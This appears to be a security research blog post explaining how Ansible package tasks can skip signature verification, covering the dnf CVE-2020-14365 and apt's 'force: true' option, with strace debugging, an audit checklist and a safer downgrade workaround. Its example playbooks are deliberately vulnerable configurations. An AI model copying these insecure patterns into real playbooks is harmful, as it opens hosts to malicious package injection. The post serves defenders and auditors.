At IncludeSec we like to contribute to open source where we can, so we’ve opened a pull request to resolve this shortcoming of the apt module. This time, the change has integration tests and will hopefully meet the requirements of the project and get merged!

(Update: Our PR was accepted and usable as of Ansible Core version 2.12)

The next part of this series will explore using Semgrep to identify this vulnerability and others in Ansible playbooks. We’ll review the top 10 Ansible security audits checks presented and see how much of the hard work can be automated through static analysis. We’ve got a lot more to say about this, stay tuned for our next post on the topic!

The post Hack Series: Is your Ansible Package Configuration Secure? appeared first on Include Security Research Blog.

Hack Series: Is your Ansible Package Configuration Secure?

In our client assessment work hacking software and cloud systems of all types, we’re often asked to look into configuration management tools such as Ansible. In this post we’ll deep dive into what package management vulnerabilities in the world of Ansible look like. First we’ll recap what Ansible is, provide some tips for security pros to debug it at a lower level, and explore both a CVE in the dnf module and an interesting gotcha in the apt module.

To ensure we’re always looking out for DevSecOps and aiding defenders, our next post in this series will touch on the strengths and weaknesses of tools like Semgrep for catching vulnerabilities in Ansible configurations.

Ansible

Ansible is an open source, Python-based, configuration management tool developed by Red Hat. It enables DevOps and other system maintainers to easily write automation playbooks, composed of a series of tasks in YAML format, and then run those playbooks against targeted hosts. A key feature of Ansible is that it is agentless: the targeted hosts don’t need to have Ansible installed, just Python and SSH. The machine running the playbook (“control node” in Ansible speak) copies the Python code required to run the tasks to the targeted hosts (“managed nodes”) over SSH, and then executes that code remotely. Managed nodes are organized into groups in an “inventory” for easy targeting by playbooks.

codingpackets.com

In 2019 Ansible was the most popular cloud configuration management tool. While the paradigm of “immutable infrastructure” has led to more enthusiasm for choosing Terraform and Docker for performing several tasks that previously might have been done by Ansible, it is still an immensely popular tool for provisioning resources, services, and applications.

Ansible provides a large number of built-in modules, which are essentially high-level interfaces for calling common system commands like apt, yum, or sysctl. The modules are Python files that do the work of translating the specified YAML tasks into the commands that actually get executed on the managed nodes. For example, the following playbook contains a single Ansible task which uses the apt module to install NGINX on a Debian-based system. Normally an Ansible playbook would be run against a remote host, but in our examples we are targeting localhost for illustrative purposes:

- name: Sample Apt Module Playbook
  hosts: localhost
  become: yes
  become_user: root
  tasks:
    - name: ensure nginx is installed
      apt:
        name: nginx
        state: present

To understand better what this playbook is doing under the hood, let’s use a debugging technique that will come in useful when we look at vulnerabilities later. Since Ansible doesn’t natively provide a way to see the exact commands getting run, we can use a handy strace invocation. strace allows us to follow the flow of system calls that this playbook triggers when run normally under ansible-playbook, even as Ansible forks off multiple child processes (“-f” flag), so we can view the command that ultimately gets executed:

$ sudo strace -f -e trace=execve ansible-playbook playbook.yml 2>&1 | grep apt
[pid 11377] execve("/usr/bin/apt-get", ["/usr/bin/apt-get", "-y", "-o", "Dpkg::Options::=--force-confdef", "-o", "Dpkg::Options::=--force-confold", "install", "nginx"], 0x195b3e0 /* 33 vars */) = 0

Using both strace command line options ("-e trace=execve“) and the grep as filters, we are making sure that irrelevant system calls are not output to the terminal; this avoids the noise of all the setup code that both Ansible and the apt module need to run before finally fulfilling the task. Ultimately we can see that the playbook runs the command apt-get install nginx, with a few extra command line flags to automate accepting confirmation prompts and interactive dialogues.

If you are following along and don’t see the apt-get install command in the strace output, make sure NGINX is uninstalled first. To improve performance and prevent unwanted side-effects, Ansible first checks whether a task has already been achieved, and so returns early with an “ok” status if it thinks NGINX is already in the installed state.

Top 10 Tips for Ansible Security Audits

As shown, Ansible transforms tasks declared in simple YAML format into system commands often run as root on the managed nodes. This layer of abstraction can easily turn into a mismatch between what a task appears to do and what actually happens under the hood. We will explore where such mismatches in Ansible’s built-in modules make it possible to create configuration vulnerabilities across all managed nodes.

But first, let’s take a step back and contextualize this by running through general tips if you are auditing an Ansible-managed infrastructure. From an infrastructure security perspective, Ansible does not expose as much attack surface as some other configuration management tools. SSH is the default transport used to connect from the control node to the managed nodes, so Ansible traffic takes advantage of the sane defaults, cryptography, and integration with Linux servers that the OpenSSH server offers. However, Ansible can be deployed in many ways, and best practices may be missed when writing roles and playbooks. Here are IncludeSec’s top 10 Ansible security checks to remember when reviewing a configuration:

  1. Is an old version of Ansible being used which is vulnerable to known CVEs?
  2. Are hardcoded secrets checked into YAML files?
  3. Are managed nodes in different environments (production, development, staging) not appropriately separated into inventories?
  4. Are the control nodes which Ansible is running from not completely locked down?
  5. Are unsafe lookups which facilitate template injection enabled?
  6. Are SSHD config files using unrecommended settings like permitting root login or enabling remote port forwarding?
  7. Are alternative connection methods being used (such as ansible-pull) and are they being appropriately secured?
  8. Is the output of playbook runs not being logged or audited by default?
  9. Is the confidential output of privileged tasks being logged?
  10. Are high-impact roles/tasks (e.g. those that are managing authentication, or installing packages) actually doing what they appear to be?

Whether those tips apply will obviously vary depending on whether the organization is managing Ansible behind a tool like Ansible Tower, or if it’s a startup where all developers have SSH access to production. However, one thing that remains constant is that Ansible is typically used to install packages to setup managed nodes, so configuration vulnerabilities in package management tasks are of particular interest. We will focus on cases where declaring common package management operations in Ansible YAML format can have unintended security consequences.

CVE-2020-14365: Package Signature Ignored in dnf Module

The most obvious type of mismatch between YAML abstraction and reality in an Ansible module would be an outright bug. A recent example of this is CVE-2020-14365. The dnf module installs packages using the dnf package manager, the successor of yum and the default on Fedora Linux. The bug was that the module didn’t perform signature verification on packages it downloaded. Here is an example of a vulnerable task when run on Ansible versions <2.8.15 and <2.9.13:

- name: The task in this playbook was vulnerable to CVE-2020-14365
  hosts: localhost
  become: yes
  become_user: root
  tasks:
    - name: ensure nginx is installed
      dnf:
        name: nginx
        state: present

The vulnerability is severe when targeted by advanced attackers; an opening for supply-chain attack. The lack of signature verification makes it possible for both the package mirror and man-in-the-middle (MITM) attackers on the network in between to supply their own packages which execute arbitrary commands as root on the host during installation.

For more details about how to perform such an attack, this guide walks through injecting backdoored apt packages from a MITM perspective. The scenario was presented a few years ago on a HackTheBox machine.

The issue is exacerbated by the fact that in most cases on Linux distros, GPG package signatures are the only thing giving authenticity and integrity to the downloaded packages. Package mirrors don’t widely use HTTPS (see Why APT does not use HTTPS for the justification), including dnf. With HTTPS transport between mirror and host, the CVE is still exploitable by a malicious mirror but at least the MITM attacks are a lot harder to pull off. We ran a quick test and despite Fedora using more HTTPS mirrors than Debian, some default mirrors selected due to geographical proximity were HTTP-only:

The root cause of the CVE was that the Ansible dnf module imported a Python module as an interface for handling dnf operations, but did not call a crucial _sig_check_pkg() function. Presumably, this check was either forgotten or assumed to be performed automatically in the imported module.

Package Signature Checks Can be Bypassed When Downgrading Package Versions

The dnf example was clearly a bug, now patched, so let’s move on to a more subtle type of mismatch where the YAML interface doesn’t map cleanly to the desired low-level behavior. This time it is in the apt package manager module and is a mistake we have seen in several production Ansible playbooks.

In a large infrastructure, it is common to install packages from multiple sources, from a mixture of official distro repositories, third-party repositories, and in-house repositories. Sometimes the latest version of a package will cause dependency problems or remove features which are relied upon. The solution which busy teams often choose is to downgrade the package to the last version that was working. While downgrades should never be a long-term solution, they can be necessary when the latest version is actively breaking production or a package update contains a bug.

When run interactively from the command line, apt install (and apt-get install, they are identical for our purposes) allows you to specify an older version you want to downgrade to, and it will do the job. But when accepting confirmation prompts automatically (in “-y” mode, which Ansible uses), apt will error out unless the --allow-downgrades argument is explicitly specified. Further confirmation is required since a downgrade may break other packages. But the Ansible apt module doesn’t offer an --allow-downgrades option equivalent; there’s no clear way to make a downgrade work using Ansible.

The first Stackoverflow answer that comes up when searching for “ansible downgrade package” recommends using force: true (or force: yes which is equivalent in YAML):

- name: Downgrade NGINX in a way that is vulnerable
  hosts: localhost
  become: yes
  become_user: root
  tasks:
    - name: ensure nginx is installed
      apt:
        name: nginx=1.14.0-0ubuntu1.2
        force: true
        state: present

This works fine, and without follow-up, this pattern can become a fixture of the configuration which an organization runs regularly across hosts. Unfortunately, it creates a vulnerability similar to the dnf CVE, disabling signature verification.

To look into what is going on, let’s use the strace command line to see the full invocation:

$ sudo strace -f -e trace=execve ansible-playbook apt_force_true.yml 2>&1 | grep apt
[pid 479683] execve("/usr/bin/apt-get", ["/usr/bin/apt-get", "-y", "-o", "Dpkg::Options::=--force-confdef", "-o", "Dpkg::Options::=--force-confold", "--force-yes", "install", "nginx=1.14.0-0ubuntu1.2"], 0x1209b40 /* 33 vars */) = 0

The force: true option has added the –force-yes parameter (as stated in the apt module docs). --force-yes is a blunt hammer that will ignore any problems with the installation, including a bad signature on the downloaded package. If this same apt-get install command is run manually from the command line, it will warn: --force-yes is deprecated, use one of the options starting with --allow instead. And to Ansible’s credit, it also warns in the docs that force “is a destructive operation with the potential to destroy your system, and it should almost never be used.”

So why is use of force: true so prevalent across Ansible deployments we have seen? It’s because there’s no alternative for this common downgrade use-case besides running the full apt install command line using the command or shell modules, which is stylistically the opposite of what Ansible is all about.

On the Ansible issue tracker, people have been asking for years for an allow_downgrade option for the apt module, but two separate pull requests have been stuck in limbo because they do not meet the needs of the project. Ansible requires integration tests for every feature, and they are difficult to provide for this functionality since Debian-derived distros don’t normally host older versions of packages in their default repositories to downgrade to. The yum and dnf modules have had an allow_downgrade option since 2018.

Fixing the Problem

At IncludeSec we like to contribute to open source where we can, so we’ve opened a pull request to resolve this shortcoming of the apt module, by adding an allow_downgrade option. This time, the change has integration tests and will hopefully meet the requirements of the project and get merged!

In the meantime, how to safely drop back to an old version of a package in an Ansible managed infrastructure? First, run a one-time apt install command with the --allow-downgrades option. Next, subsequent upgrades of the package can be prevented using either Apt Pinning or dpkg holding, native methods in Debian-derived distros to do this. The hold can be performed by Ansible with the dpkg_selections module:

- name: Downgrade and Hold a Package
  hosts: localhost
  become: yes
  become_user: root
  tasks:
    - name: ensure nginx is downgraded
      command:
        cmd: "apt install -y -o Dpkg::Options::=--force-confold -o Dpkg::Options::=--force-confdef --allow-downgrades nginx=1.16.0-1~buster"
    - name: ensure nginx is held back
      dpkg_selections:
        name: nginx
        selection: hold

Overall the approach isn’t obvious nor pretty and is therefore a perfect example of a mismatch between the YAML abstraction which appears to just force a downgrade, and the reality which is that it forces ignoring signature verification errors too. We hope this will change soon.

The next part of this series will explore using Semgrep to identify this vulnerability and others in Ansible playbooks. We’ll review the top 10 Ansible security audits checks presented and see how much of the hard work can be automated through static analysis. We’ve got a lot more to say about this, stay tuned for our next post on the topic!

The post Hack Series: Is your Ansible Package Configuration Secure? appeared first on Include Security Research Blog.

❌
❌